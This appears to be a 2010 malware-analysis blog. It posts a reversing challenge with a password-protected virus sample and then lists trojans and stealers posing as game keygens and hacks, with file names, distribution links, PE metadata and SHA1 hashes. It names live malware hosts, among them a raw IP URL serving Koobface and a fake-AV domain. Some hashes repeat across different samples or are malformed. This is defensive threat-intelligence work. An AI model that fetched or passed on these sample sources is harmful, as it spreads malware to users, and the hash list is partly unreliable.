    Language: VB6 (Voluntarily coded in this language)

    Rules: - Make a tutorial*
    - Code a tool to disinfect your computer (with source)

    I hope to see some innovative solutions!
    Good luck & Have fun!
    Mail: phoenixbytes@live.fr (For Solution Submission)

    After first solutions, I will release the virus source code and your solutions.
    =============================================================
    *The main goal of this challenge is to give newbies a way to learn, so they need a proper tutorial.
    Think about these words when writing your tutorial.
    Explain what you did.
    And this is not done by writing two lines and commenting some code parts.
    Think about the information you needed the first time, when you were new to reversing..
    Archive password: b0x

    Download



    Horadrim solution: Click here

    packetdeath solution: Click here, Screenshot


    Source code:

    Thanks to everyone who has tried this challenge!


[Xylibox] Malware notification 2010/05/04 - File Name: steamkeys.exe
  • Localisation: http://www.youtube.com/watch?v=a4x-Pkn4O8g
  • Original Name: Stub.exe
  • File Type : Exe, Size : 90684 (01623Ch) Byte(s)
  • Packer: Unknown
  • EP: 0001736E
  • EP Offset: 0001576E
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Stealer + Youtube account deleted + gmail account changed
  • SHA1: 7c8024dfa5835507bbe2414d9c0bbea1aff3791e

[News] 2010/04/27 - Stealers: You Click, You Lose.

    Stealers:
    Password Stealers are, as the name indicates, tools designed to steal passwords.
    They are part of a vast set of password attack tools and techniques.
    They are small, specialised spying programs that form a sub-family of spyware.
    They build a log of all the passwords found on a machine and make them available to someone with physical access to the attacked computer, or send them, generally by a hidden e-mail, to the thief.

    Video



  • Mw2Keygen3.exe: 48a67db09517d1b3195ac402dc23507a10645079
  • Mw2Keygen2.exe: ac867125725a9e757f9280b46b101fd2dcfca779

[Xylibox] Malware notification 2010/04/22 - File Name: allopass_generator_1.0.exe
  • Localisation: http://www.youtube.com/watch?v=6PnfIlnvIfk
  • Original Name: 72389 binder stub.exe
  • File Type : Exe, Size : 174673 (02AA51h) Byte(s)
  • Packer: Unknown
  • EP: 0000598E
  • EP Offset: 00003D8E
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: binded shit hackhoundserver.exe
  • SHA1: 2df8c6f7b9a2fe3ce93693b8c063a044fcf8f28e

[Xylibox] Malware notification 2010/04/22 - File Name: Steam Acc Hacker.exe
  • Localisation: http://www.youtube.com/watch?v=FfwCOixAmJU
  • Original Name: Unknown
  • File Type : Exe, Size : 536324 (082F04h) Byte(s)
  • Packer: Unknown
  • EP: 0000AB5C
  • EP Offset: 00009F5C
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Binded shit
  • SHA1: b89d3e2ac7de1e11feee64912018cf21ff6d2f19

[Xylibox] Malware notification 2010/04/22 - File Name: Steam Passwort Hacker.exe
  • Localisation: http://www.youtube.com/watch?v=Txju--XSa7I
  • Original Name: Steam Hack Tool.exe
  • File Type : Exe, Size : 209000 (033068h) Byte(s)
  • Packer: Unknown
  • EP: 0000A37E
  • EP Offset: 0000877E
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Passwd stealer, was sent to alphalords@gmx.de
  • SHA1: 98c600f4b03436c840ccb5f273f4f1275119eb70

[News] 2010/04/17 - Malware Analyse: IM51332.JPG-www.myspace.com.exe
    A short analysis so you can get a glimpse of the work :)
    The archive will probably be blocked by your anti-virus because of the malware inside it.
    For obvious security reasons I put the malware in a password-protected .zip file.
    The password is in the archive's description.
    Download

  • Name: IM51332.JPG-www.myspace.com.exe
  • File Type : Exe, Size : 98958 (01828Eh) Byte(s)
  • Packer: Unknown
  • EP: 00001240
  • EP Offset: 00000640
  • EP Section: .text
  • Linker: 2.56
  • SHA1: 14550cd11d0a08b5d1682f6bb588a3450b81074b

[Xylibox] Malware notification 2010/04/14 - File Name: syspck32.exe
  • <nico34_> I have an exe on hand if you're interested.
    <Xylitol> Send.
  • Original Name: v2vapp.exe
  • File Type : Exe, Size : 35840 (08C00h) Byte(s)
  • Packer: Unknown
  • EP: 0000110C
  • EP Offset: 0000050C
  • EP Section: .text
  • Linker: 4.9
  • Info additionnel: Trojan, dropper
    Impossible to debug (for me) due to the crash after the thread is created.

  • SHA1: ad37e72cf428a75d5226532315a294cef7f8c72d

[Xylibox] Malware notification 2010/04/14 - File Name: setup.exe
  • Localisation: http://208.86.61.239:971/325859d15f1bd/
  • Original Name: oXKJVd.exe
  • File Type : Exe, Size : 72704 (011C00h) Byte(s)
  • Packer: Unknown
  • EP: 000010B8
  • EP Offset: 000004B8
  • EP Section: .text
  • Linker: 7.10
  • Info additionnel: Koobface family with fakeAV: antimalware-proz0.com
  • setup.exe: fd406d74b9f5ad0f512ba5179e3b68e14c70e555
  • bill106.exe: fd406d74b9f5ad0f512ba5179e3b68e14c70e555
  • rdr_1271198398.exe: 09EDF610CD87E6A8279CB8821B97C35232B195CE
  • Setup_312s2.exe: 1C95393FBAEB3D41D665FCAEE52D9B07AB8AEA92
  • rdr_1271198009.exe: 9316F5879F43BC43B1513481ED281970AEBC28C82
  • Video

[Xylibox] Malware notification 2010/04/13 - File Name: AssualtCube hack.exe
  • Localisation: http://www.youtube.com/watch?v=YVSdAOaQ3r0
  • Original Name: ¬¬¬¬¬¬lijkjkjDFFNFGDFFFFFHLULZ¬¬¬¬¬¬¬.exe
  • File Type : Exe, Size : 340078 (05306Eh) Byte(s)
  • Packer: Unknown
  • EP: 000012F8
  • EP Offset: 000012F8
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Trojan Horse.
    The file comes with "AssualtCube hack.dll"; the dll is clean, it's a dll for a program called "Black skillz Public", a Warrock hack...
    About AssualtCube hack.exe:
    it creates a file in "C:\Documents and Settings\Administrateur\Application Data",
    a file with a VB icon called "winregsec.exe"; this file is also launched by AssualtCube hack.exe
    Solution: kill the process and delete the files "winregsec.exe" and "AssualtCube hack.exe"

  • AssualtCube hack.exe: 209d422930c440c92560e43bfa8646c880fd2a21
  • winregsec.exe: d9885c6c127f81df4112559a1407c09818e1153b

[News] 2010/04/13 - W32/TrojanDownloader.FakeAlert.ISecurity2010
    A small thought for the MAD team

  • 41.exe - 6225a8826df0a8794d4419498a1c8a581946e8fc
  • setup.exe - c0da206aa57be1380e2a138e745a505abc7849af
  • IS2010.exe - 8ce0214b485e9a2c0b1e0ba182b1a31a1cc964ef
  • http://buy-is2010.com/buy/?code=00001222
  • Video


[Xylibox] Malware notification 2010/04/06 - File Name: Windows Loader 7.0.exe
  • Localisation: http://www.youtube.com/watch?v=lKdH7VWUC54
  • Original Name: Loader.exe
  • File Type : Exe, Size : 118784 (01D000h) Byte(s)
  • Packer: Unknown
  • EP: 00001150
  • EP Offset: 00001150
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Trojan Horse, pihbot.exe
  • SHA1: a39e0fc39dcd87ea56312650d74e066122d1b4e9

[Xylibox] Malware notification 2010/04/06 - File Name: KeyGen Senders.Exe
  • Localisation: http://www.youtube.com/watch?v=QbtAhJL12bY
  • Original Name: C:\Documents and Settings\nathu\Desktop\stub - Version 3.0 mini.exe
  • File Type : Exe, Size : 383324 (05D95Ch) Byte(s)
  • Packer: Unknown
  • EP: 0001752E
  • EP Offset: 0001572E
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Virus
  • SHA1: e2bebb71bbaec99d98819fb470cc674b434e6d1f

[Xylibox] Malware notification 2010/04/06 - File Name: MsnPasswordCrack.exe
  • Localisation: http://www.youtube.com/watch?v=74dRo8bwCE8
  • Original Name: MsnPasswordCrack.exe
  • File Type : Exe, Size : 56320 (0DC00h) Byte(s)
  • Packer: Unknown
  • EP: 0000E23E
  • EP Offset: 0000C63E
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Social engineering Manipulation, exe Clean
  • SHA1: 5b91338a044c3ce240e75bc7deb0386b9c623b0d

[Xylibox] Malware notification 2010/04/06 - File Name: Half-Life 2 KeyGen.exe
  • Localisation: http://www.youtube.com/watch?v=HDCt4z0z0fg
  • Original Name: HL2.exe
  • File Type : Exe, Size : 737280 (0B4000h) Byte(s)
  • Packer: Unknown
  • EP: 000010B0
  • EP Offset: 000010B0
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Trojan Horse, crypted
  • SHA1: 8a65dfd14998eaaa8addfe9fe47cfeee2ddf104c

[Xylibox] Malware notification 2010/04/05 - File Name: CoD 6 Keygen.exe
  • Localisation: http://www.youtube.com/watch?v=F4xL6qWmUeQ
  • Original Name: COD6Keygen.exe
  • File Type : Exe, Size : 475136 (074000h) Byte(s)
  • Packer: Unknown
  • EP: 000010E4
  • EP Offset: 000010E4
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Trojan Horse
  • SHA1: ae1100b2e3e83c1d78ef9f3b8ef5426a6a97ef75

[Xylibox] Malware notification 2010/04/04 - File Name: Cheat-Crash-Pack.exe
  • Localisation: http://www.youtube.com/watch?v=DrPIgenUB90
  • Original Name: stub.exe
  • File Type : Exe, Size : 593920 (091000h) Byte(s)
  • Packer: Unknown
  • EP: 000010EC
  • EP Offset: 000010EC
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Stealer, crypted
  • SHA1: 9f9c0e754d51989e9126fcdd35b6a4c9a4519332

[Xylibox] Malware notification 2010/04/04 - File Name: Css Public Server Hack.exe
  • Localisation: http://www.youtube.com/watch?v=o4qCrtQnVFs
  • Original Name: stub.exe
  • File Type : Exe, Size : 163840 (028000h) Byte(s)
  • Packer: Unknown
  • EP: 00002604
  • EP Offset: 00002604
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Stealer, crypted
  • SHA1: ff5c7bb112fa099ec4ef4708d331ad719787c832

[Xylibox] Malware notification 2010/04/04 - File Name: Sprut.exe
  • Localisation: http://www.youtube.com/watch?v=IspFO4B3Sr8
  • Original Name: Unknown
  • File Type : Exe, Size : 446464 (06D000h) Byte(s)
  • Packer: Unknown
  • EP: 000646CE
  • EP Offset: 000636CE
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Stealer, crypted, original.txt, original.exe
  • SHA1: 79ee1c2ada8889ef9607d9912d77330451e951fa

[Xylibox] Malware notification 2010/04/04 - File Name: Facebook Cracker.exe
  • Localisation: http://www.youtube.com/watch?v=L1C835eUuXU
  • Original Name: Unknown
  • File Type : Exe, Size : 292376 (047618h) Byte(s)
  • Packer: Unknown
  • EP: 00004AEE
  • EP Offset: 00002EEE
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Trojan, crypted, RFile1.exe, RFile2.exe
  • SHA1: 7be8d1d6a4090837e67eb63e5bf4e6f16b29c3b2

[Xylibox] Malware notification 2010/04/04 - File Name: RuneScape Hack v2.0.exe
  • Localisation: http://www.youtube.com/watch?v=yHNYlzkAzr8
  • Original Name: Unknown
  • File Type : Exe, Size : 316416 (04D400h) Byte(s)
  • Packer: Unknown
  • EP: 0000BBF4
  • EP Offset: 0000AFF4
  • EP Section: CODE
  • Linker: 2.25
  • Info additionnel: Stealer
  • SHA1: 7be8d1d6a4090837e67eb63e5bf4e6f16b29c3b2

[Xylibox] Malware notification 2010/04/04 - File Name: (2) faceboook.exe
  • Localisation: http://www.youtube.com/watch?v=DBlcSvvmAIg
  • Original Name: Unknown
  • File Type : Exe, Size : 191878 (02ED86h) Byte(s)
  • Packer: WinRAR SFX Archive
  • EP: 0000A7D8
  • EP Offset: 00009BD8
  • EP Section: .text
  • Linker: 9.0
  • Info additionnel: Trojan, SFX silent mode, f.exe
  • SHA1: 90cfe4d251c519a2dacb8a775ec1f039046ac29f

[Xylibox] Malware notification 2010/04/03 - File Name: keygen.exe
  • Localisation: http://www.youtube.com/watch?v=Apro919wsTA
  • Original Name: Unknown
  • File Type : Exe, Size : 16896 (04200h) Byte(s)
  • Packer: Unknown
  • EP: 000039FA
  • EP Offset: 00002DFA
  • EP Section: .text
  • Linker: 7.10
  • Info additionnel: Trojan
  • SHA1: 49bc0e4aa29eaa65580272f99c601e432a426d45
    [Xylibox] SHA-1 Similarity found: Malware notification 2010/03/30 - File Name: keygen.exe

[Xylibox] Malware notification 2010/04/03 - File Name: CoD-Mw2.exe
  • Localisation: http://www.youtube.com/watch?v=5z0OwaPl9bc
  • Original Name: PumpkinZ.exe
  • File Type : Exe, Size : 2318336 (0236000h) Byte(s)
  • Packer: Unknown
  • EP: 00001834
  • EP Offset: 00001834
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Backdoor, n.exe
  • SHA1: 3de4c6474af655c5ab6a95d7560bff50e7d31188

[Xylibox] Malware notification 2010/04/03 - File Name: css_keygen.exe
  • Localisation: http://www.youtube.com/watch?v=4Wl2EJyw6E0
  • Original Name: css_keygen.exe
  • File Type : Exe, Size : 95744 (017600h) Byte(s)
  • Packer: Unknown
  • EP: 00018CBE
  • EP Offset: 00016EBE
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Stealer
  • SHA1: 1780985e6e7c2650a4073aa1a49030ee5fecc7dc

[Xylibox] Malware notification 2010/04/03 - File Name: MSN_Hacker_Privat.exe
  • Localisation: http://www.youtube.com/watch?v=LmywM9ONweU
  • Original Name: Unknown
  • File Type : Exe, Size : 142644 (022D34h) Byte(s)
  • Packer: Unknown
  • EP: 00001130
  • EP Offset: 00001130
  • EP Section: 
  • Linker: 6.0
  • Info additionnel: Trojan Horse
  • SHA1: 567cbecc2ec0dc9ad0c881a761b1cc38a5a6602d

[Xylibox] Malware notification 2010/04/02 - File Name: -Hacktool- Provided By Hamoortal.exe
  • Localisation: http://www.youtube.com/watch?v=g549qSx1lOI
  • Original Name: Unknown
  • File Type : Exe, Size : 1385688 (01524D8h) Byte(s)
  • Packer: UPX modded + WinRAR SFX Archive*
  • EP: 0003EF40
  • EP Offset: 0000B340
  • EP Section: UPX1
  • Linker: 5.0
  • Info additionnel: Trojan, Packed,SFX (Silent mode): make 1.exe, 2.exe at C:\
  • SHA1: 8ad6137ab38dd4d8a840e582be50cbc0f0ed7f7f

[Xylibox] Malware notification 2010/04/01 - File Name: UltimateCodes.exe
  • Localisation: http://www.youtube.com/watch?v=twITAWYZT64
  • Original Name: Unknown
  • File Type : Exe, Size : 93696 (016E00h) Byte(s)
  • Packer: Unknown
  • EP: 00001C83
  • EP Offset: 00001083
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Trojan, Packed
  • SHA1: ae667b8decb585255f611b31d17d8ce3d0441757

[Xylibox] Malware notification 2010/04/01 - File Name: LightPower.exe
  • Localisation: http://www.youtube.com/watch?v=iLzLSvNc4KU
  • Original Name: LightPower.exe
  • File Type : Exe, Size : 157184 (026600h) Byte(s)
  • Packer: Unknown
  • EP: 0002747E
  • EP Offset: 0002567E
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Social engineering Manipulation, exe Clean
  • SHA1: 904757452254c553da6a55976a80cc267d9f37a7

[Xylibox] Malware notification 2010/04/01 - File Name: UltimateHack.exe
  • Localisation: http://www.youtube.com/watch?v=_97qjcH4u1U
  • Original Name: Stub_d.exe
  • File Type : Exe, Size : 144028 (02329Ch) Byte(s)
  • Packer: Unknown
  • EP: 00014DFE
  • EP Offset: 000131FE
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Trojan Dropper
  • SHA1: fc2b8da1cbdedf27cd0b28693f1601f9c9b4b2af

[Xylibox] Malware notification 2010/04/01 - File Name: Crack.exe
  • Localisation: http://www.youtube.com/watch?v=BheJrZGvYLA
  • Original Name: Unknown
  • File Type : Exe, Size : 9781434 (09540BAh) Byte(s)
  • Packer: WinRAR SFX Archive*
  • EP: 00001000
  • EP Offset: 00000600
  • EP Section: .text
  • Linker: 5.0
  • Info additionnel: Stealer
  • SHA1: 840f2e356014828afc0f6b2b8ac0633a2635516d

[Xylibox] Malware notification 2010/04/01 - File Name: Workin Steam keygen.exe
  • Localisation: http://www.youtube.com/watch?v=yjc63XhKZY0
  • Original Name: Unknown
  • File Type : Exe, Size : 746086 (0B6266h) Byte(s)
  • Packer: Unknown
  • EP: 00014470
  • EP Offset: 00014470
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Stealer
  • SHA1: d86eabef366b51d0d7c7f30e07769386962e6472

[Xylibox] Malware notification 2010/03/30 - File Name: Steam Keygen.exe
  • Location: http://www.youtube.com/watch?v=gjNuD6EU2Nc
  • Original Name: Unknown
  • File Type : Exe, Size : 388096 (05EC00h) Byte(s)
  • Packer: Unknown
  • EP: 000059AC
  • EP Offset: 00004DAC
  • EP Section: .text
  • Linker: 8.0
  • Additional info: Stealer
  • SHA1: b1682a331cb20b4415435dc6e7487c14d222d1e0

[Xylibox] Malware notification 2010/03/30 - File Name: Steam Keygen.exe
  • Location: http://www.youtube.com/watch?v=efy2yfFlEMA
  • Original Name: Unknown
  • File Type : Exe, Size : 141312 (022800h) Byte(s)
  • Packer: Unknown
  • EP: 00004A84
  • EP Offset: 00003E84
  • EP Section: .text
  • Linker: 6.0
  • Additional info: Trojan Horse
  • SHA1: 0fb6b3b8fa846fa836bcd8c365f199d3b665376f

[Xylibox] Malware notification 2010/03/30 - File Name: SteamKeygen.exe
  • Location: http://www.youtube.com/watch?v=kt67C8VpIwI
  • Original Name: Unknown
  • File Type : Exe, Size : 1683856 (019B190h) Byte(s)
  • Packer: Unknown
  • EP: 00001B68
  • EP Offset: 00001B68
  • EP Section: .text
  • Linker: 6.0
  • Additional info: Stealer
  • SHA1: 1f0a5e21cbe1fb997edfe7a32d8d13f7ed66161b

[Xylibox] Malware notification 2010/03/30 - File Name: keygen.exe
  • Location: http://www.youtube.com/watch?v=NusPK9HleOg
  • Original Name: Unknown
  • File Type : Exe, Size : 16896 (04200h) Byte(s)
  • Packer: Unknown
  • EP: 000039FA
  • EP Offset: 00002DFA
  • EP Section: .text
  • Linker: 7.10
  • Additional info: Trojan
  • SHA1: 49bc0e4aa29eaa65580272f99c601e432a426d45

[Xylibox] Malware notification 2010/03/29 - File Name: Program.exe
  • Location: http://www.youtube.com/watch?v=aKvfgfhKpcA
  • Original Name: zx1l23112@!#!@#.exe
  • File Type : Exe, Size : 189620 (02E4B4h) Byte(s)
  • Packer: Unknown
  • EP: 0000539E
  • EP Offset: 0000379E
  • EP Section: .text
  • Linker: 8.0
  • Additional info: Trojan Dropper, Crypted
  • SHA1: c9558f955f4f0d79836977098081f428d4f36c5d

[Xylibox] Malware notification 2010/03/29 - File Name: L4D2 Hack Working!.exe
  • Location: Unknown
  • Original Name: JStub.exe
  • File Type : Exe, Size : 777760 (0BDE20h) Byte(s)
  • Packer: Unknown
  • EP: 000060BE
  • EP Offset: 000044BE
  • EP Section: .text
  • Linker: 8.0
  • Additional info: Keylogger
  • SHA1: b38cacb8875d3f86b116f65c8763264594aca592

[Xylibox] Malware notification 2010/03/29 - File Name: KeyGen.exe
  • Location: Unknown
  • Original Name: Unknown
  • File Type : Exe, Size : 303104 (04A000h) Byte(s)
  • Packer: Unknown
  • EP: 00001108
  • EP Offset: 00001108
  • EP Section: .text
  • Linker: 6.0
  • Additional info: Trojan Dropper
  • SHA1: ca85648e0fc01d0830656c8429af96f3760ce805

[Xylibox] Malware notification 2010/03/29 - File Name: Steam Keygen!.exe
  • Location: http://www.youtube.com/watch?v=kRaXrx1iK9k
  • Original Name: TeamViewer.exe
  • File Type : Exe, Size : 618527 (09701Fh) Byte(s)
  • Packer: Unknown
  • EP: 00009A98
  • EP Offset: 00007C98
  • EP Section: .rsrc
  • Linker: 8.0
  • Additional info: CabineStub.exe, Backdoor
  • SHA1: 97b64072330846910fb35201e54ad6a2effd16cc

[Xylibox] Malware notification 2010/03/28 - File Name: Steam Account Cracker v2.exe
  • Location: http://www.youtube.com/watch?v=63Amk3QhXMA
  • Original Name: yorl.dll
  • File Type : Exe, Size : 1226859 (012B86Bh) Byte(s)
  • Packer: Unknown
  • EP: 000048E0
  • EP Offset: 000048E0
  • EP Section: .text
  • Linker: 6.0
  • Additional info: Backdoor
  • SHA1: 5a7b461499fe63dfccce2b4b08299c68d343d1b2

[Xylibox] Malware notification 2010/03/28 - File Name: OopsCrasher1.5.exe
  • Location: http://forum.wawa-mania.ws/viewtopic.php?id=403485
  • Original Name: Unknown
  • File Type : Exe, Size : 287232 (046200h) Byte(s)
  • Packer: UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo
  • EP: 00056710
  • EP Offset: 00045B10
  • EP Section: UPX1
  • Linker: 2.25
  • Additional info: Stealer
  • SHA1: 0d5e3ce22a527319b3272efd145191e001da1244